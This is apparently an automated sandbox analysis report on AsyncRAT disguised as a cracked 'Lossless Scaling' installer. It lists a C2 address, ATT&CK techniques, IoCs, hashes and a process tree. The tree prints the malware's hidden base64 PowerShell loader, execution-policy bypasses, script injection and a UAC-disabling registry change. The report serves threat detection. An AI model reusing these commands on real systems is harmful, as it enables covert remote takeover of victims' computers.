asyncrat | hxxps://drive[.]google[.]com/file/d/12_FHYiGAJjr_9k7nMRclVc5d9oFiJjga/view

Resubmissions

06/02/2025, 19:45

250206-ygn9sawqfk 10

06/02/2025, 19:43

250206-yfjmxavlex 6

Analysis

max time kernel
120s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
06/02/2025, 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/12_FHYiGAJjr_9k7nMRclVc5d9oFiJjga/view

Score

10^/10

asyncrat default defense_evasion discovery execution rat trojan

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

eg3x6.giize.com:306

Mutex

MaterxMutex_Egypt2

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5128	powershell.exe
1476	powershell.exe
1808	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
5112	LosslessScaling.exe
5400	RAR.exe

Loads dropped DLL 1 IoCs

pid	Process
5112	LosslessScaling.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	NOTEPAD.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
9	drive.google.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1808 set thread context of 1944	1808	powershell.exe	155

Drops file in Program Files directory 31 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Lan.vbs	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Lossless.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Licenses.txt	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\Lossless Scaling.lnk	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\config.ini	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll	powershell.exe
File created	C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Control Panel 1 IoCs

defense_evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\Colors	LosslessScaling.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3776	reg.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1944	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
3228	msedge.exe
3228	msedge.exe
4940	msedge.exe
4940	msedge.exe
220	msedge.exe
220	msedge.exe
1940	identity_helper.exe
1940	identity_helper.exe
5980	mspaint.exe
5980	mspaint.exe
5128	powershell.exe
5128	powershell.exe
5128	powershell.exe
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
1476	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
1944	aspnet_compiler.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe
5112	LosslessScaling.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	5128	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	5112	LosslessScaling.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	1944	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	5112	LosslessScaling.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
5980	mspaint.exe
3036	OpenWith.exe
5112	LosslessScaling.exe
1944	aspnet_compiler.exe
5112	LosslessScaling.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 4536	4940	msedge.exe	84
PID 4940 wrote to memory of 4536	4940	msedge.exe	84
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 1080	4940	msedge.exe	85
PID 4940 wrote to memory of 3228	4940	msedge.exe	86
PID 4940 wrote to memory of 3228	4940	msedge.exe	86
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87
PID 4940 wrote to memory of 3488	4940	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.google.com/file/d/12_FHYiGAJjr_9k7nMRclVc5d9oFiJjga/view
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9007846f8,0x7ff900784708,0x7ff900784718
  2⤵
  PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
  2⤵
  PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:8
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3200

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5428

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_lossless scaling.zip\password 123.txt
1⤵
PID:5568

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" E:\HOW TO CRACK.txt
1⤵
- Enumerates connected drives
PID:5724

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\How to run the program.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:5996

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\a\install + Crack.bat" "
1⤵
PID:1456
- C:\Windows\system32\reg.exe
  REG QUERY "HKU\S-1-5-19"
  2⤵
  PID:5140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
    3⤵
    - UAC bypass
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3776
  - - C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
      "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies Control Panel
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5112
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn administrator
      4⤵
      PID:4652
  - - C:\Users\Public\IObitUnlocker\RAR.exe
      "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
      4⤵
      Executes dropped EXE
      PID:5400
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
      4⤵
      Checks computer location settings
      PID:4860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:5852
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1944
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn administrator
      4⤵
      PID:3280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Lossless Scaling\Lossless.dll

Filesize
4.3MB

MD5
7969a2cbc4c31ccfb1ab8213f19501b9

SHA1
06a24af6e922ba2cd7fccb76ce2f43271a9af8b6

SHA256
486a48562504a274e984599a5931de200ea73bf6bc4c83bf6ca8daa651e80a68

SHA512
935988a39c1af479e971850f6758ee94098b35f173da609206312deeabeb3bc9466f93d1dad4e6d7938235f65fc52fdbd56058d46c1ba775d31718358eb6d8fa

Download Submit
C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe

Filesize
953KB

MD5
2c98d33096e97094cbbbd19f27f40883

SHA1
7e28af9d119d2658f962e3b28140c6081be1612b

SHA256
010ac1120a88a772e87d9e9018aa5db034a9bac9399803d4a7c4db3c47a71df6

SHA512
f9070ad6b2e3295fdde13aa8d7486147a7f9a675a924ad3bf117479baf5b573cf92650199e58378dd8345a28ab890bbd5021d374030c24836bfa65bb037dddc7

Download Submit
C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config

Filesize
174B

MD5
2a2df45a07478a1c77d5834c21f3d7fd

SHA1
f949e331f0d75ba38d33a072f74e2327c870d916

SHA256
051099983b896673909e01a1f631b6652abb88da95c9f06f3efef4be033091fa

SHA512
1a6dd48f92ea6b68ee23b86ba297cd1559f795946ecda17ade68aea3dda188869bba380e3ea3472e08993f4ae574c528b34c3e25503ee6119fd4f998835e09d7

Download Submit
C:\Program Files (x86)\Lossless Scaling\config.ini

Filesize
430B

MD5
ef7d84d756944b899e4fb5d1a3339235

SHA1
bcac0a048a418caec5281cc44121576d1cde4e70

SHA256
069ae15289a748ae4e1a998183c41c35a873cb8dc205318813b157c826bab6ca

SHA512
a73e18adaa6f1e93a457d4593a652ee47eb730cac3b81cfbc1fc3ab90aa05f518ae7c96c78e94ab92949dd2c4e9a459bb54012e97fb53554397d5a6a8b556327

Download Submit
C:\Users\Admin\AppData\Local\Lossless Scaling\Settings.xml

Filesize
2KB

MD5
45fed0a3bcbc889ca99d0c5943210e7e

SHA1
602584366a413cb9ae459b6c3231190cd787241e

SHA256
